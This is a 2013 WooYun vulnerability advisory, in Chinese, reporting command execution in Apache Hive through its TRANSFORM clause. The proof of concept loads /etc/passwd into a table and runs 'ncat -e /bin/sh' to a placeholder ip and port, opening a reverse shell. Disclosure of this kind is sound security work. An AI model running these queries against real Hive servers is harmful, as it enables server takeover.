漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-018834
漏洞标题:Hive任意命令/代码执行漏洞
相关厂商:apache
漏洞作者: kindle
提交时间:2013-02-18 09:57
修复时间:2013-02-18 09:57
公开时间:2013-02-18 09:57
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-02-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。
详细说明:
HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限
漏洞证明:
创建测试表
create table if not exists kindle(exploit string);
导入/etc/passwd文件到kindle表数据(这步很关键,没数据无法触发漏洞)
load data local inpath '/etc/passwd' INTO TABLE kindle;
通过transform来自定义hive使用的shell命令,反弹shell
select transform(exploit) USING '/usr/bin/ncat -e /bin/sh ip port' from kindle;
删除测试表
drop table kindle;
修复方案:
block transform
版权声明:转载请注明来源 kindle@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝